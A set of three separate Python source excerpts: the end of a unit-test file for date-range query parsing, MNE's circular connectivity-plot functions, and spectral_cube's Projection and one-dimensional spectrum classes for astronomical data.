def test_too_many_components(self):
with self.assertRaises(InvalidQueryArgumentValueError):
DateQuery('added', '12-34-56-78')
def test_invalid_date_query(self):
q_list = [
'2001-01-0a',
'2001-0a',
'200a',
'2001-01-01..2001-01-0a',
'2001-0a..2001-01',
'200a..2002',
'20aa..',
'..2aa'
]
for q in q_list:
with self.assertRaises(InvalidQueryArgumentValueError):
DateQuery('added', q)
def test_datetime_uppercase_t_separator(self):
date_query = DateQuery('added', '2000-01-01T12')
self.assertEqual(date_query.interval.start, datetime(2000, 1, 1, 12))
self.assertEqual(date_query.interval.end, datetime(2000, 1, 1, 13))
def test_datetime_lowercase_t_separator(self):
date_query = DateQuery('added', '2000-01-01t12')
self.assertEqual(date_query.interval.start, datetime(2000, 1, 1, 12))
self.assertEqual(date_query.interval.end, datetime(2000, 1, 1, 13))
def test_datetime_space_separator(self):
date_query = DateQuery('added', '2000-01-01 12')
self.assertEqual(date_query.interval.start, datetime(2000, 1, 1, 12))
self.assertEqual(date_query.interval.end, datetime(2000, 1, 1, 13))
def test_datetime_invalid_separator(self):
with self.assertRaises(InvalidQueryArgumentValueError):
DateQuery('added', '2000-01-01x12')
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| |
"""Functions to plot on circle as for connectivity
"""
from __future__ import print_function
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Denis Engemann <denis.engemann@gmail.com>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
#
# License: Simplified BSD
from itertools import cycle
from functools import partial
import numpy as np
from .utils import plt_show
from ..externals.six import string_types
from ..fixes import tril_indices, normalize_colors
def circular_layout(node_names, node_order, start_pos=90, start_between=True,
group_boundaries=None, group_sep=10):
"""Create layout arranging nodes on a circle.
Parameters
----------
node_names : list of str
Node names.
node_order : list of str
List with node names defining the order in which the nodes are
arranged. Must have the elements as node_names but the order can be
different. The nodes are arranged clockwise starting at "start_pos"
degrees.
start_pos : float
Angle in degrees that defines where the first node is plotted.
start_between : bool
If True, the layout starts with the position between the nodes. This is
the same as adding "180. / len(node_names)" to start_pos.
group_boundaries : None | array-like
List of of boundaries between groups at which point a "group_sep" will
be inserted. E.g. "[0, len(node_names) / 2]" will create two groups.
group_sep : float
Group separation angle in degrees. See "group_boundaries".
Returns
-------
node_angles : array, shape=(len(node_names,))
Node angles in degrees.
"""
n_nodes = len(node_names)
if len(node_order) != n_nodes:
raise ValueError('node_order has to be the same length as node_names')
if group_boundaries is not None:
boundaries = np.array(group_boundaries, dtype=np.int)
if np.any(boundaries >= n_nodes) or np.any(boundaries < 0):
raise ValueError('"group_boundaries" has to be between 0 and '
'n_nodes - 1.')
if len(boundaries) > 1 and np.any(np.diff(boundaries) <= 0):
raise ValueError('"group_boundaries" must have non-decreasing '
'values.')
n_group_sep = len(group_boundaries)
else:
n_group_sep = 0
boundaries = None
# convert it to a list with indices
node_order = [node_order.index(name) for name in node_names]
node_order = np.array(node_order)
if len(np.unique(node_order)) != n_nodes:
raise ValueError('node_order has repeated entries')
node_sep = (360. - n_group_sep * group_sep) / n_nodes
if start_between:
start_pos += node_sep / 2
if boundaries is not None and boundaries[0] == 0:
# special case when a group separator is at the start
start_pos += group_sep / 2
boundaries = boundaries[1:] if n_group_sep > 1 else None
node_angles = np.ones(n_nodes, dtype=np.float) * node_sep
node_angles[0] = start_pos
if boundaries is not None:
node_angles[boundaries] += group_sep
node_angles = np.cumsum(node_angles)[node_order]
return node_angles
def _plot_connectivity_circle_onpick(event, fig=None, axes=None, indices=None,
n_nodes=0, node_angles=None,
ylim=[9, 10]):
"""Isolates connections around a single node when user left clicks a node.
On right click, resets all connections."""
if event.inaxes != axes:
return
if event.button == 1: # left click
# click must be near node radius
if not ylim[0] <= event.ydata <= ylim[1]:
return
# all angles in range [0, 2*pi]
node_angles = node_angles % (np.pi * 2)
node = np.argmin(np.abs(event.xdata - node_angles))
patches = event.inaxes.patches
for ii, (x, y) in enumerate(zip(indices[0], indices[1])):
patches[ii].set_visible(node in [x, y])
fig.canvas.draw()
elif event.button == 3: # right click
patches = event.inaxes.patches
for ii in range(np.size(indices, axis=1)):
patches[ii].set_visible(True)
fig.canvas.draw()
def plot_connectivity_circle(con, node_names, indices=None, n_lines=None,
node_angles=None, node_width=None,
node_colors=None, facecolor='black',
textcolor='white', node_edgecolor='black',
linewidth=1.5, colormap='hot', vmin=None,
vmax=None, colorbar=True, title=None,
colorbar_size=0.2, colorbar_pos=(-0.3, 0.1),
fontsize_title=12, fontsize_names=8,
fontsize_colorbar=8, padding=6.,
fig=None, subplot=111, interactive=True,
node_linewidth=2., show=True):
"""Visualize connectivity as a circular graph.
Note: This code is based on the circle graph example by Nicolas P. Rougier
http://www.labri.fr/perso/nrougier/coding/.
Parameters
----------
con : array
Connectivity scores. Can be a square matrix, or a 1D array. If a 1D
array is provided, "indices" has to be used to define the connection
indices.
node_names : list of str
Node names. The order corresponds to the order in con.
indices : tuple of arrays | None
Two arrays with indices of connections for which the connections
strenghts are defined in con. Only needed if con is a 1D array.
n_lines : int | None
If not None, only the n_lines strongest connections (strength=abs(con))
are drawn.
node_angles : array, shape=(len(node_names,)) | None
Array with node positions in degrees. If None, the nodes are equally
spaced on the circle. See mne.viz.circular_layout.
node_width : float | None
Width of each node in degrees. If None, the minimum angle between any
two nodes is used as the width.
node_colors : list of tuples | list of str
List with the color to use for each node. If fewer colors than nodes
are provided, the colors will be repeated. Any color supported by
matplotlib can be used, e.g., RGBA tuples, named colors.
facecolor : str
Color to use for background. See matplotlib.colors.
textcolor : str
Color to use for text. See matplotlib.colors.
node_edgecolor : str
Color to use for lines around nodes. See matplotlib.colors.
linewidth : float
Line width to use for connections.
colormap : str
Colormap to use for coloring the connections.
vmin : float | None
Minimum value for colormap. If None, it is determined automatically.
vmax : float | None
Maximum value for colormap. If None, it is determined automatically.
colorbar : bool
Display a colorbar or not.
title : str
The figure title.
colorbar_size : float
Size of the colorbar.
colorbar_pos : 2-tuple
Position of the colorbar.
fontsize_title : int
Font size to use for title.
fontsize_names : int
Font size to use for node names.
fontsize_colorbar : int
Font size to use for colorbar.
padding : float
Space to add around figure to accommodate long labels.
fig : None | instance of matplotlib.pyplot.Figure
The figure to use. If None, a new figure with the specified background
color will be created.
subplot : int | 3-tuple
Location of the subplot when creating figures with multiple plots. E.g.
121 or (1, 2, 1) for 1 row, 2 columns, plot 1. See
matplotlib.pyplot.subplot.
interactive : bool
When enabled, left-click on a node to show only connections to that
node. Right-click shows all connections.
node_linewidth : float
Line with for nodes.
show : bool
Show figure if True.
Returns
-------
fig : instance of matplotlib.pyplot.Figure
The figure handle.
axes : instance of matplotlib.axes.PolarAxesSubplot
The subplot handle.
"""
import matplotlib.pyplot as plt
import matplotlib.path as m_path
import matplotlib.patches as m_patches
n_nodes = len(node_names)
if node_angles is not None:
if len(node_angles) != n_nodes:
raise ValueError('node_angles has to be the same length '
'as node_names')
# convert it to radians
node_angles = node_angles * np.pi / 180
else:
# uniform layout on unit circle
node_angles = np.linspace(0, 2 * np.pi, n_nodes, endpoint=False)
if node_width is None:
# widths correspond to the minimum angle between two nodes
dist_mat = node_angles[None, :] - node_angles[:, None]
dist_mat[np.diag_indices(n_nodes)] = 1e9
node_width = np.min(np.abs(dist_mat))
else:
node_width = node_width * np.pi / 180
if node_colors is not None:
if len(node_colors) < n_nodes:
node_colors = cycle(node_colors)
else:
# assign colors using colormap
node_colors = [plt.cm.spectral(i / float(n_nodes))
for i in range(n_nodes)]
# handle 1D and 2D connectivity information
if con.ndim == 1:
if indices is None:
raise ValueError('indices has to be provided if con.ndim == 1')
elif con.ndim == 2:
if con.shape[0] != n_nodes or con.shape[1] != n_nodes:
raise ValueError('con has to be 1D or a square matrix')
# we use the lower-triangular part
indices = tril_indices(n_nodes, -1)
con = con[indices]
else:
raise ValueError('con has to be 1D or a square matrix')
# get the colormap
if isinstance(colormap, string_types):
colormap = plt.get_cmap(colormap)
# Make figure background the same colors as axes
if fig is None:
fig = plt.figure(figsize=(8, 8), facecolor=facecolor)
# Use a polar axes
if not isinstance(subplot, tuple):
subplot = (subplot,)
axes = plt.subplot(*subplot, polar=True, axisbg=facecolor)
# No ticks, we'll put our own
plt.xticks([])
plt.yticks([])
# Set y axes limit, add additional space if requested
plt.ylim(0, 10 + padding)
# Remove the black axes border which may obscure the labels
axes.spines['polar'].set_visible(False)
# Draw lines between connected nodes, only draw the strongest connections
if n_lines is not None and len(con) > n_lines:
con_thresh = np.sort(np.abs(con).ravel())[-n_lines]
else:
con_thresh = 0.
# get the connections which we are drawing and sort by connection strength
# this will allow us to draw the strongest connections first
con_abs = np.abs(con)
con_draw_idx = np.where(con_abs >= con_thresh)[0]
con = con[con_draw_idx]
con_abs = con_abs[con_draw_idx]
indices = [ind[con_draw_idx] for ind in indices]
# now sort them
sort_idx = np.argsort(con_abs)
con_abs = con_abs[sort_idx]
con = con[sort_idx]
indices = [ind[sort_idx] for ind in indices]
# Get vmin vmax for color scaling
if vmin is None:
vmin = np.min(con[np.abs(con) >= con_thresh])
if vmax is None:
vmax = np.max(con)
vrange = vmax - vmin
# We want to add some "noise" to the start and end position of the
# edges: We modulate the noise with the number of connections of the
# node and the connection strength, such that the strongest connections
# are closer to the node center
nodes_n_con = np.zeros((n_nodes), dtype=np.int)
for i, j in zip(indices[0], indices[1]):
nodes_n_con[i] += 1
nodes_n_con[j] += 1
# initialize random number generator so plot is reproducible
rng = np.random.mtrand.RandomState(seed=0)
n_con = len(indices[0])
noise_max = 0.25 * node_width
start_noise = rng.uniform(-noise_max, noise_max, n_con)
end_noise = rng.uniform(-noise_max, noise_max, n_con)
nodes_n_con_seen = np.zeros_like(nodes_n_con)
for i, (start, end) in enumerate(zip(indices[0], indices[1])):
nodes_n_con_seen[start] += 1
nodes_n_con_seen[end] += 1
start_noise[i] *= ((nodes_n_con[start] - nodes_n_con_seen[start]) /
float(nodes_n_con[start]))
end_noise[i] *= ((nodes_n_con[end] - nodes_n_con_seen[end]) /
float(nodes_n_con[end]))
# scale connectivity for colormap (vmin<=>0, vmax<=>1)
con_val_scaled = (con - vmin) / vrange
# Finally, we draw the connections
for pos, (i, j) in enumerate(zip(indices[0], indices[1])):
# Start point
t0, r0 = node_angles[i], 10
# End point
t1, r1 = node_angles[j], 10
# Some noise in start and end point
t0 += start_noise[pos]
t1 += end_noise[pos]
verts = [(t0, r0), (t0, 5), (t1, 5), (t1, r1)]
codes = [m_path.Path.MOVETO, m_path.Path.CURVE4, m_path.Path.CURVE4,
m_path.Path.LINETO]
path = m_path.Path(verts, codes)
color = colormap(con_val_scaled[pos])
# Actual line
patch = m_patches.PathPatch(path, fill=False, edgecolor=color,
linewidth=linewidth, alpha=1.)
axes.add_patch(patch)
# Draw ring with colored nodes
height = np.ones(n_nodes) * 1.0
bars = axes.bar(node_angles, height, width=node_width, bottom=9,
edgecolor=node_edgecolor, lw=node_linewidth,
facecolor='.9', align='center')
for bar, color in zip(bars, node_colors):
bar.set_facecolor(color)
# Draw node labels
angles_deg = 180 * node_angles / np.pi
for name, angle_rad, angle_deg in zip(node_names, node_angles, angles_deg):
if angle_deg >= 270:
ha = 'left'
else:
# Flip the label, so text is always upright
angle_deg += 180
ha = 'right'
axes.text(angle_rad, 10.4, name, size=fontsize_names,
rotation=angle_deg, rotation_mode='anchor',
horizontalalignment=ha, verticalalignment='center',
color=textcolor)
if title is not None:
plt.title(title, color=textcolor, fontsize=fontsize_title,
axes=axes)
if colorbar:
norm = normalize_colors(vmin=vmin, vmax=vmax)
sm = plt.cm.ScalarMappable(cmap=colormap, norm=norm)
sm.set_array(np.linspace(vmin, vmax))
cb = plt.colorbar(sm, ax=axes, use_gridspec=False,
shrink=colorbar_size,
anchor=colorbar_pos)
cb_yticks = plt.getp(cb.ax.axes, 'yticklabels')
cb.ax.tick_params(labelsize=fontsize_colorbar)
plt.setp(cb_yticks, color=textcolor)
# Add callback for interaction
if interactive:
callback = partial(_plot_connectivity_circle_onpick, fig=fig,
axes=axes, indices=indices, n_nodes=n_nodes,
node_angles=node_angles)
fig.canvas.mpl_connect('button_press_event', callback)
plt_show(show)
return fig, axes
| |
from __future__ import print_function, absolute_import, division
import warnings
import numpy as np
from numpy.ma.core import nomask
from astropy import convolution
from astropy import units as u
from astropy import wcs
#from astropy import log
from astropy.io.fits import Header, HDUList, PrimaryHDU, BinTableHDU, FITS_rec
from radio_beam import Beam, Beams
from astropy.io.registry import UnifiedReadWriteMethod
from . import spectral_axis
from .io.core import LowerDimensionalObjectWrite
from .utils import SliceWarning, BeamWarning, SmoothingWarning, FITSWarning
from .cube_utils import convert_bunit
from . import wcs_utils
from .masks import BooleanArrayMask, MaskBase
from .base_class import (BaseNDClass, SpectralAxisMixinClass,
SpatialCoordMixinClass, MaskableArrayMixinClass,
MultiBeamMixinClass, BeamMixinClass,
HeaderMixinClass
)
from . import cube_utils
__all__ = ['LowerDimensionalObject', 'Projection', 'Slice', 'OneDSpectrum']
class LowerDimensionalObject(u.Quantity, BaseNDClass, HeaderMixinClass):
"""
Generic class for 1D and 2D objects.
"""
@property
def hdu(self):
if self.wcs is None:
hdu = PrimaryHDU(self.value)
else:
hdu = PrimaryHDU(self.value, header=self.header)
hdu.header['BUNIT'] = self.unit.to_string(format='fits')
if 'beam' in self.meta:
hdu.header.update(self.meta['beam'].to_header_keywords())
return hdu
def read(self, *args, **kwargs):
raise NotImplementedError()
write = UnifiedReadWriteMethod(LowerDimensionalObjectWrite)
def __getslice__(self, start, end, increment=None):
# I don't know why this is needed, but apparently one of the inherited
# classes implements getslice, which forces us to overwrite it
# I can't find any examples where __getslice__ is actually implemented,
# though, so this seems like a deep and frightening bug.
#log.debug("Getting a slice from {0} to {1}".format(start,end))
return self.__getitem__(slice(start, end, increment))
def __getitem__(self, key, **kwargs):
"""
Return a new `~spectral_cube.lower_dimensional_structures.LowerDimensionalObject` of the same class while keeping
other properties fixed.
"""
new_qty = super(LowerDimensionalObject, self).__getitem__(key)
if new_qty.ndim < 2:
# do not return a projection
return u.Quantity(new_qty)
if self._wcs is not None:
if ((isinstance(key, tuple) and
any(isinstance(k, slice) for k in key) and
len(key) > self.ndim)):
# Example cases include: indexing tricks like [:,:,None]
warnings.warn("Slice {0} cannot be used on this {1}-dimensional"
" array's WCS. If this is intentional, you "
" should use this {2}'s ``array`` or ``quantity``"
" attribute."
.format(key, self.ndim, type(self)),
SliceWarning
)
return self.quantity[key]
else:
newwcs = self._wcs[key]
else:
newwcs = None
new = self.__class__(value=new_qty.value,
unit=new_qty.unit,
copy=False,
wcs=newwcs,
meta=self._meta,
mask=(self._mask[key] if self._mask is not nomask
else None),
header=self._header,
**kwargs)
new._wcs = newwcs
new._meta = self._meta
new._mask=(self._mask[key] if self._mask is not nomask else nomask)
new._header = self._header
return new
def __array_finalize__(self, obj):
self._wcs = getattr(obj, '_wcs', None)
self._meta = getattr(obj, '_meta', None)
self._mask = getattr(obj, '_mask', None)
self._header = getattr(obj, '_header', None)
self._spectral_unit = getattr(obj, '_spectral_unit', None)
self._fill_value = getattr(obj, '_fill_value', np.nan)
self._wcs_tolerance = getattr(obj, '_wcs_tolerance', 0.0)
if isinstance(obj, VaryingResolutionOneDSpectrum):
self._beams = getattr(obj, '_beams', None)
else:
self._beam = getattr(obj, '_beam', None)
super(LowerDimensionalObject, self).__array_finalize__(obj)
@property
def __array_priority__(self):
return super(LowerDimensionalObject, self).__array_priority__*2
@property
def array(self):
"""
Get a pure array representation of the LDO. Useful when multiplying
and using numpy indexing tricks.
"""
return np.asarray(self)
@property
def _data(self):
# the _data property is required by several other mixins
# (which probably means defining it here is a bad design)
return self.array
@property
def quantity(self):
"""
Get a pure `~astropy.units.Quantity` representation of the LDO.
"""
return u.Quantity(self)
def to(self, unit, equivalencies=[], freq=None):
"""
Return a new `~spectral_cube.lower_dimensional_structures.Projection`
of the same class with the specified unit.
See `astropy.units.Quantity.to` for further details.
"""
if not isinstance(unit, u.Unit):
unit = u.Unit(unit)
if unit == self.unit:
# No copying
return self
if ((self.unit.is_equivalent(u.Jy / u.beam) and
not any({u.Jy/u.beam, u.K}.issubset(set(eq)) for eq in equivalencies))):
# the 'not any' above checks that there is not already a defined
# Jy<->K equivalency. If there is, the code below is redundant
# and will cause problems.
if hasattr(self, 'beams'):
factor = (self.jtok_factors(equivalencies=equivalencies) *
(self.unit*u.beam).to(u.Jy))
else:
# replace "beam" with the actual beam
if not hasattr(self, 'beam'):
raise ValueError("To convert objects with Jy/beam units, "
"the object needs to have a beam defined.")
brightness_unit = self.unit * u.beam
# create a beam equivalency for brightness temperature
if freq is None:
try:
freq = self.with_spectral_unit(u.Hz).spectral_axis
except AttributeError:
raise TypeError("Object of type {0} has no spectral "
"information. `freq` must be provided for"
" unit conversion from Jy/beam"
.format(type(self)))
else:
if not freq.unit.is_equivalent(u.Hz):
raise u.UnitsError("freq must be given in equivalent "
"frequency units.")
bmequiv = self.beam.jtok_equiv(freq)
# backport to handle astropy < 3: the beam equivalency was only
# modified to handle jy/beam in astropy 3
if bmequiv[0] == u.Jy:
bmequiv.append([u.Jy/u.beam, u.K, bmequiv[2], bmequiv[3]])
factor = brightness_unit.to(unit,
equivalencies=bmequiv + list(equivalencies))
else:
# scaling factor
factor = self.unit.to(unit, equivalencies=equivalencies)
converted_array = (self.quantity * factor).value
# use private versions of variables, not the generated property
# versions
# Not entirely sure the use of __class__ here is kosher, but we do want
# self.__class__, not super()
new = self.__class__(value=converted_array, unit=unit, copy=True,
wcs=self._wcs, meta=self._meta, mask=self._mask,
header=self._header)
return new
@property
def _mask(self):
""" Annoying hack to deal with np.ma.core.is_mask failures (I don't
like using __ but I think it's necessary here)"""
if self.__mask is None:
# need this to be *exactly* the numpy boolean False
return nomask
return self.__mask
@_mask.setter
def _mask(self, value):
self.__mask = value
def shrink_mask(self):
"""
Copy of the numpy masked_array shrink_mask method. This is essentially
a hack needed for matplotlib to show images.
"""
m = self._mask
if m.ndim and not m.any():
self._mask = nomask
return self
def _initial_set_mask(self, mask):
"""
Helper tool to validate mask when originally setting it in __new__
Note that because this is intended to be used in __new__, order
matters: ``self`` must have ``_wcs``, for example.
"""
if mask is None:
mask = BooleanArrayMask(np.ones_like(self.value, dtype=bool),
self._wcs, shape=self.value.shape)
elif isinstance(mask, np.ndarray):
if mask.shape != self.value.shape:
raise ValueError("Mask shape must match the {0} shape."
.format(self.__class__.__name__)
)
mask = BooleanArrayMask(mask, self._wcs, shape=self.value.shape)
elif isinstance(mask, MaskBase):
pass
else:
raise TypeError("mask of type {} is not a supported mask "
"type.".format(type(mask)))
# Validate the mask before setting
mask._validate_wcs(new_data=self.value, new_wcs=self._wcs,
wcs_tolerance=self._wcs_tolerance)
self._mask = mask
class Projection(LowerDimensionalObject, SpatialCoordMixinClass,
MaskableArrayMixinClass, BeamMixinClass):
def __new__(cls, value, unit=None, dtype=None, copy=True, wcs=None,
meta=None, mask=None, header=None, beam=None,
fill_value=np.nan, read_beam=False, wcs_tolerance=0.0):
if np.asarray(value).ndim != 2:
raise ValueError("value should be a 2-d array")
if wcs is not None and wcs.wcs.naxis != 2:
raise ValueError("wcs should have two dimension")
self = u.Quantity.__new__(cls, value, unit=unit, dtype=dtype,
copy=copy).view(cls)
self._wcs = wcs
self._meta = {} if meta is None else meta
self._wcs_tolerance = wcs_tolerance
self._initial_set_mask(mask)
self._fill_value = fill_value
if header is not None:
self._header = header
else:
self._header = Header()
if beam is None:
if "beam" in self.meta:
beam = self.meta['beam']
elif read_beam:
beam = cube_utils.try_load_beam(header)
if beam is None:
warnings.warn("Cannot load beam from header.",
BeamWarning
)
if beam is not None:
self.beam = beam
self.meta['beam'] = beam
# TODO: Enable header updating when non-celestial slices are
# properly handled in the WCS object.
# self._header.update(beam.to_header_keywords())
self._cache = {}
return self
def with_beam(self, beam):
'''
Attach a new beam object to the Projection.
Parameters
----------
beam : `~radio_beam.Beam`
A new beam object.
'''
meta = self.meta.copy()
meta['beam'] = beam
return self._new_projection_with(beam=beam, meta=meta)
def with_fill_value(self, fill_value):
"""
Create a new :class:`Projection` or :class:`Slice` with a different
``fill_value``.
"""
return self._new_projection_with(fill_value=fill_value)
@property
def _new_thing_with(self):
return self._new_projection_with
def _new_projection_with(self, data=None, wcs=None, mask=None, meta=None,
fill_value=None, spectral_unit=None, unit=None,
header=None, wcs_tolerance=None, beam=None,
**kwargs):
data = self._data if data is None else data
if unit is None and hasattr(data, 'unit'):
if data.unit != self.unit:
raise u.UnitsError("New data unit '{0}' does not"
" match unit '{1}'. You can"
" override this by specifying the"
" `unit` keyword."
.format(data.unit, self.unit))
unit = data.unit
elif unit is None:
unit = self.unit
elif unit is not None:
# convert string units to Units
if not isinstance(unit, u.Unit):
unit = u.Unit(unit)
if hasattr(data, 'unit'):
if u.Unit(unit) != data.unit:
raise u.UnitsError("The specified new cube unit '{0}' "
"does not match the input unit '{1}'."
.format(unit, data.unit))
else:
data = u.Quantity(data, unit=unit, copy=False)
wcs = self._wcs if wcs is None else wcs
mask = self._mask if mask is None else mask
if meta is None:
meta = {}
meta.update(self._meta)
if unit is not None:
meta['BUNIT'] = unit.to_string(format='FITS')
fill_value = self._fill_value if fill_value is None else fill_value
if beam is None:
if hasattr(self, 'beam'):
beam = self.beam
newproj = self.__class__(value=data, wcs=wcs, mask=mask, meta=meta,
unit=unit, fill_value=fill_value,
header=header or self._header,
wcs_tolerance=wcs_tolerance or self._wcs_tolerance,
beam=beam,
**kwargs)
return newproj
@staticmethod
def from_hdu(hdu):
'''
Return a projection from a FITS HDU.
'''
if isinstance(hdu, HDUList):
hdul = hdu
hdu = hdul[0]
if not len(hdu.data.shape) == 2:
raise ValueError("HDU must contain two-dimensional data.")
meta = {}
mywcs = wcs.WCS(hdu.header)
if "BUNIT" in hdu.header:
unit = convert_bunit(hdu.header["BUNIT"])
meta["BUNIT"] = hdu.header["BUNIT"]
else:
unit = None
beam = cube_utils.try_load_beam(hdu.header)
self = Projection(hdu.data, unit=unit, wcs=mywcs, meta=meta,
header=hdu.header, beam=beam)
return self
def quicklook(self, filename=None, use_aplpy=True, aplpy_kwargs={}):
"""
Use `APLpy <https://pypi.python.org/pypi/APLpy>`_ to make a quick-look
image of the projection. This will make the ``FITSFigure`` attribute
available.
If there are unmatched celestial axes, this will instead show an image
without axis labels.
Parameters
----------
filename : str or Non
Optional - the filename to save the quicklook to.
"""
if use_aplpy:
try:
if not hasattr(self, 'FITSFigure'):
import aplpy
self.FITSFigure = aplpy.FITSFigure(self.hdu,
**aplpy_kwargs)
self.FITSFigure.show_grayscale()
self.FITSFigure.add_colorbar()
if filename is not None:
self.FITSFigure.save(filename)
except (wcs.InconsistentAxisTypesError, ImportError):
self._quicklook_mpl(filename=filename)
else:
self._quicklook_mpl(filename=filename)
def _quicklook_mpl(self, filename=None):
from matplotlib import pyplot
self.figure = pyplot.gcf()
self.image = pyplot.imshow(self.value)
if filename is not None:
self.figure.savefig(filename)
def convolve_to(self, beam, convolve=convolution.convolve_fft):
"""
Convolve the image to a specified beam.
Parameters
----------
beam : `radio_beam.Beam`
The beam to convolve to
convolve : function
The astropy convolution function to use, either
`astropy.convolution.convolve` or
`astropy.convolution.convolve_fft`
Returns
-------
proj : `Projection`
A Projection convolved to the given ``beam`` object.
"""
self._raise_wcs_no_celestial()
if not hasattr(self, 'beam'):
raise ValueError("No beam is contained in Projection.meta.")
# Check if the beams are the same.
if beam == self.beam:
warnings.warn("The given beam is identical to the current beam. "
"Skipping convolution.")
return self
pixscale = wcs.utils.proj_plane_pixel_area(self.wcs.celestial)**0.5 * u.deg
convolution_kernel = \
beam.deconvolve(self.beam).as_kernel(pixscale)
newdata = convolve(self.value, convolution_kernel,
normalize_kernel=True)
self = Projection(newdata, unit=self.unit, wcs=self.wcs,
meta=self.meta, header=self.header,
beam=beam)
return self
def reproject(self, header, order='bilinear'):
"""
Reproject the image into a new header.
Parameters
----------
header : `astropy.io.fits.Header`
A header specifying a cube in valid WCS
order : int or str, optional
The order of the interpolation (if ``mode`` is set to
``'interpolation'``). This can be either one of the following
strings:
* 'nearest-neighbor'
* 'bilinear'
* 'biquadratic'
* 'bicubic'
or an integer. A value of ``0`` indicates nearest neighbor
interpolation.
"""
self._raise_wcs_no_celestial()
try:
from reproject.version import version
except ImportError:
raise ImportError("Requires the reproject package to be"
" installed.")
# Need version > 0.2 to work with cubes
from distutils.version import LooseVersion
if LooseVersion(version) < "0.3":
raise Warning("Requires version >=0.3 of reproject. The current "
"version is: {}".format(version))
from reproject import reproject_interp
# TODO: Find the minimal footprint that contains the header and only reproject that
# (see FITS_tools.regrid_cube for a guide on how to do this)
newwcs = wcs.WCS(header)
shape_out = [header['NAXIS{0}'.format(i + 1)] for i in range(header['NAXIS'])][::-1]
newproj, newproj_valid = reproject_interp((self.value,
self.header),
newwcs,
shape_out=shape_out,
order=order)
self = Projection(newproj, unit=self.unit, wcs=newwcs,
meta=self.meta, header=header,
read_beam=True)
return self
def subimage(self, xlo='min', xhi='max', ylo='min', yhi='max'):
"""
Extract a region spatially.
Parameters
----------
[xy]lo/[xy]hi : int or `astropy.units.Quantity` or `min`/`max`
The endpoints to extract. If given as a quantity, will be
interpreted as World coordinates. If given as a string or
int, will be interpreted as pixel coordinates.
"""
self._raise_wcs_no_celestial()
limit_dict = {'xlo': 0 if xlo == 'min' else xlo,
'ylo': 0 if ylo == 'min' else ylo,
'xhi': self.shape[1] if xhi == 'max' else xhi,
'yhi': self.shape[0] if yhi == 'max' else yhi}
dims = {'x': 1,
'y': 0}
for val in (xlo, ylo, xhi, yhi):
if hasattr(val, 'unit') and not val.unit.is_equivalent(u.degree):
raise u.UnitsError("The X and Y slices must be specified in "
"degree-equivalent units.")
for lim in limit_dict:
limval = limit_dict[lim]
if hasattr(limval, 'unit'):
dim = dims[lim[0]]
sl = [slice(0, 1)]
sl.insert(dim, slice(None))
spine = self.world[tuple(sl)][dim]
val = np.argmin(np.abs(limval - spine))
if limval > spine.max() or limval < spine.min():
pass
# log.warn("The limit {0} is out of bounds."
# " Using min/max instead.".format(lim))
if lim[1:] == 'hi':
# End-inclusive indexing: need to add one for the high
# slice
limit_dict[lim] = val + 1
else:
limit_dict[lim] = val
slices = [slice(limit_dict[xx + 'lo'], limit_dict[xx + 'hi'])
for xx in 'yx']
return self[tuple(slices)]
def to(self, unit, equivalencies=[], freq=None):
"""
Return a new `~spectral_cube.lower_dimensional_structures.Projection`
of the same class with the specified unit.
See `astropy.units.Quantity.to` for further details.
"""
return super(Projection, self).to(unit, equivalencies, freq)
# A slice is just like a projection in every way
class Slice(Projection):
pass
class BaseOneDSpectrum(LowerDimensionalObject, MaskableArrayMixinClass,
SpectralAxisMixinClass):
"""
Properties shared between OneDSpectrum and VaryingResolutionOneDSpectrum.
"""
def __new__(cls, value, unit=None, dtype=None, copy=True, wcs=None,
meta=None, mask=None, header=None, spectral_unit=None,
fill_value=np.nan, wcs_tolerance=0.0):
#log.debug("Creating a OneDSpectrum with __new__")
if np.asarray(value).ndim != 1:
raise ValueError("value should be a 1-d array")
if wcs is not None and wcs.wcs.naxis != 1:
raise ValueError("wcs should have two dimension")
self = u.Quantity.__new__(cls, value, unit=unit, dtype=dtype,
copy=copy).view(cls)
self._wcs = wcs
self._meta = {} if meta is None else meta
self._wcs_tolerance = wcs_tolerance
self._initial_set_mask(mask)
self._fill_value = fill_value
if header is not None:
self._header = header
else:
self._header = Header()
self._spectral_unit = spectral_unit
if spectral_unit is None:
if 'CUNIT1' in self._header:
self._spectral_unit = u.Unit(self._header['CUNIT1'])
elif self._wcs is not None:
self._spectral_unit = u.Unit(self._wcs.wcs.cunit[0])
return self
def __repr__(self):
prefixstr = '<' + self.__class__.__name__ + ' '
arrstr = np.array2string(self.filled_data[:].value, separator=',',
prefix=prefixstr)
return '{0}{1}{2:s}>'.format(prefixstr, arrstr, self._unitstr)
@staticmethod
def from_hdu(hdu):
'''
Return a OneDSpectrum from a FITS HDU or HDU list.
'''
if isinstance(hdu, HDUList):
hdul = hdu
hdu = hdul[0]
else:
hdul = HDUList([hdu])
if not len(hdu.data.shape) == 1:
raise ValueError("HDU must contain one-dimensional data.")
meta = {}
mywcs = wcs.WCS(hdu.header)
if "BUNIT" in hdu.header:
unit = convert_bunit(hdu.header["BUNIT"])
meta["BUNIT"] = hdu.header["BUNIT"]
else:
unit = None
with warnings.catch_warnings():
warnings.filterwarnings('ignore', category=FITSWarning)
beam = cube_utils.try_load_beams(hdul)
if hasattr(beam, '__len__'):
beams = beam
else:
beams = None
if beams is not None:
self = VaryingResolutionOneDSpectrum(hdu.data, unit=unit,
wcs=mywcs, meta=meta,
header=hdu.header,
beams=beams)
else:
beam = cube_utils.try_load_beam(hdu.header)
self = OneDSpectrum(hdu.data, unit=unit, wcs=mywcs, meta=meta,
header=hdu.header, beam=beam)
return self
@property
def header(self):
header = super(BaseOneDSpectrum, self).header
# Preserve the spectrum's spectral units
if 'CUNIT1' in header and self._spectral_unit != u.Unit(header['CUNIT1']):
spectral_scale = spectral_axis.wcs_unit_scale(self._spectral_unit)
header['CDELT1'] *= spectral_scale
header['CRVAL1'] *= spectral_scale
header['CUNIT1'] = self.spectral_axis.unit.to_string(format='FITS')
return header
@property
def spectral_axis(self):
"""
A `~astropy.units.Quantity` array containing the central values of
each channel along the spectral axis.
"""
if self._wcs is None:
spec_axis = np.arange(self.size) * u.one
else:
spec_axis = self.wcs.wcs_pix2world(np.arange(self.size), 0)[0] * \
u.Unit(self.wcs.wcs.cunit[0])
if self._spectral_unit is not None:
spec_axis = spec_axis.to(self._spectral_unit)
return spec_axis
